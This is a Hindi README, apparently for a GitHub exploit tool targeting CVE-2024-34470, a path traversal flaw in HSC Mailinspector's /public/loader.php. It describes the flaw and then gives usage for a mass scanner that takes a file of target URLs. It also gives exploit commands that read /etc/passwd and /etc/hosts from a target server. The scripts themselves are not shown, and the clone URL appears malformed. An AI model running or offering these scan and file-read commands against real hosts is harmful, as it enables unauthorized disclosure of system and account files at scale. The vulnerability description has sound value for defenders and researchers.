
HSC Mailinspector में संस्करण 5.2.18 तक एक गंभीर भेद्यता पाई गई है। यह भेद्यता /public/loader.php फ़ाइल की एक अज्ञात कार्यक्षमता को प्रभावित करती है।
HSC Mailinspector संस्करण 5.2.18 तक में एक गंभीर भेद्यता पाई गई है। यह भेद्यता /public/loader.php फ़ाइल की एक अज्ञात कार्यक्षमता को प्रभावित करती है। 'path' तर्क में अज्ञात इनपुट के साथ छेड़छाड़ करने से पथ ट्रैवर्सल भेद्यता उत्पन्न होती है। CWE के अनुसार, इस मुद्दे को CWE-22 के रूप में वर्गीकृत किया गया है। उत्पाद किसी फ़ाइल या निर्देशिका की पहचान करने के लिए एक पथनाम का निर्माण करने हेतु बाहरी इनपुट का उपयोग करता है, जो प्रतिबंधित मूल निर्देशिका के अंतर्गत स्थित होती है, लेकिन उत्पाद पथनाम के भीतर विशेष तत्वों को ठीक से बेअसर नहीं करता है, जिसके कारण पथनाम प्रतिबंधित निर्देशिका के बाहर किसी स्थान पर संकेत कर सकता है। यह गोपनीयता, अखंडता और उपलब्धता को प्रभावित करता है।
रिपॉजिटरी क्लोन करें:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
निर्भरताएँ स्थापित करें
सुनिश्चित करें कि आपके पास Python और pip स्थापित हैं। फिर, निम्न चलाएँ:
pip install -r requirements.txt
टेक्स्ट फ़ाइल का उपयोग करके कई लक्ष्यों के लिए खोज करने हेतु, स्क्रिप्ट Massive_CVE-2024-34470.py का उपयोग करें।
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
urls.txt फ़ाइल जिस प्रारूप में होनी चाहिए वह इस प्रकार है:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
एक बार कमजोर लक्ष्यों की पहचान हो जाने पर, हम CVE-2024-34470.py नामक स्क्रिप्ट का उपयोग करके टर्मिनल के माध्यम से निर्दिष्ट सामग्री का शोषण करते हैं और प्रदर्शित करते हैं।
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)